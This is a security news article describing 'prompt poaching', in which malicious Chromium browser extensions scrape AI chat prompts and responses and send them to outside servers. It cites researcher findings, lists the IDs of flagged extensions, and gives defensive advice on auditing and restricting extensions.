New “prompt poaching” attack steals AI chats through malicious browser extensions
A new browser-based attack called “prompt poaching” lets malicious extensions copy users’ AI prompts and responses, then send that data to outside servers without clear consent. Security researchers say the threat targets people who use AI assistants inside Chrome or other Chromium-based browsers through sidebar tools and tab-aware extensions.
The risk matters because many people now use AI tools to summarize contracts, review code, draft emails, and analyze internal documents inside the browser. Microsoft says malicious AI assistant extensions have already reached about 900,000 installs and showed activity across more than 20,000 enterprise tenants, which turns a seemingly helpful add-on into a large-scale data collection channel.
Researchers at Expel say they handled several dozen incidents in the last month involving Chrome extensions that watched for AI tabs, captured questions and answers through API interception or DOM scraping, and then transmitted that material to external servers run by the extension operators.
How the attack works
The basic mechanism is simple. A malicious extension watches the pages a user opens, waits for a supported AI client to load, and then reads on-page content or intercepts data flows tied to the chat session. Expel says that behavior allows the extension to collect both the user’s input and the assistant’s reply.
That attack path fits how browser extensions work today. Google’s developer documentation says extensions can request permissions in the manifest, including host permissions and content script matches, while content scripts can read details from visited web pages through the Document Object Model and pass that data back to the parent extension.
In practice, that means an extension that asks for broad page access can become far more powerful than many users expect. Google’s Chrome Enterprise guidance also notes that administrators can control extension installs based on requested permissions, which highlights how central those permissions are to enterprise risk management.
Which extensions researchers flagged
Expel says some of the malicious tools were clones of popular AI-related extensions. The firm specifically listed “Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI” with extension ID fnmihdojmnkclgjpcoonokmkhjpjechg, “AI Sidebar with Deepseek, ChatGPT, Claude, and more” with ID inhcgfpbfdjbjogdfjbclgolkmhnooop, and “Talk to ChatGPT” with ID hoinfgbmegalflaolhknkdaajeafpilo.
Researchers also flagged a different pattern where a once-legitimate tool later gained prompt-poaching behavior after it built a large user base. Expel named Urban VPN Proxy, extension ID eppiocemhmnlbhjplcgkofciiegomcon, as an example of that approach.
Microsoft’s threat research adds wider context. It says the malicious extensions it investigated harvested full URLs and AI chat content from platforms such as ChatGPT and DeepSeek, exposing organizations to potential leaks of proprietary code, internal workflows, strategic discussions, and other confidential data.
Why prompt poaching is a serious enterprise problem
For companies, the danger goes beyond chat privacy. Employees often paste sensitive information into AI tools, including customer records, business plans, source code, tickets, and internal emails. Once a malicious extension captures that material, attackers can reuse it for phishing, fraud, reconnaissance, or resale.
The threat also scales fast because browser extensions sit inside daily workflows. Microsoft says many knowledge workers grant broad page-level permissions for convenience, and those permissions create a path for look-alike AI extensions to blend into normal browser use with very little friction.
Secure Annex, which coined the term “prompt poaching,” described it as a growing technique in which extensions capture and exfiltrate conversations users have with AI tools. That framing helps explain why the issue keeps appearing across multiple investigations rather than as a one-off malware campaign.
What security teams and users should do now
The safest response is to remove untrusted AI browser extensions, review extension permissions carefully, and switch to official desktop apps or first-party extensions where possible. Expel explicitly recommends restricting unapproved extensions and steering users toward tools developed directly by the AI vendor.
Organizations should also manage extensions centrally instead of leaving the choice to employees. Google says Chrome administrators can enforce policies for users or browsers and can control whether users may install extensions based on the permissions those extensions request.
Google’s Chrome Web Store policies state that the store aims to provide a safe and secure environment built on trust and transparency, and requires developers to follow its program policies. Even so, current research shows that malicious or deceptive extensions still make it through review, which means businesses cannot rely on store vetting alone.
Prompt poaching at a glance
| Area | What researchers found |
|---|---|
| Attack name | “Prompt poaching” |
| Main technique | DOM scraping or API interception of AI chats |
| Primary targets | Users of AI browser extensions on Chromium-based browsers |
| Data at risk | Prompts, responses, URLs, browsing telemetry |
| Scale cited by Microsoft | About 900,000 installs, activity in 20,000+ enterprise tenants |
| Main defenses | Remove suspicious extensions, restrict installs, prefer official tools |
Signs an extension may be risky
- It asks for broad access to many sites without a clear reason
- It claims support for several AI brands in one tool while hiding the vendor identity
- It appeared as a clone of a popular extension with slightly altered branding
- It changed behavior after an update
- It collects browsing data, tab activity, or page content by default
- It routes data to external servers unrelated to the stated feature set
FAQ
Prompt poaching is the theft of AI chat content by a browser extension that watches for AI sessions, copies prompts and responses, and sends them to outside servers.
The current reporting centers on Chromium-based browsers, which includes Chrome and other browsers built on the same extension model, such as Microsoft Edge.
Researchers say attackers can capture prompts, replies, full URLs, and browsing telemetry. That can expose source code, internal workflows, strategic discussions, and other confidential data.
Ban unsanctioned extensions, audit installed add-ons, review requested permissions, and move workers to official AI clients or trusted first-party extensions.
Read our disclosure page to find out how can you help VPNCentral sustain the editorial team Read more
User forum
0 messages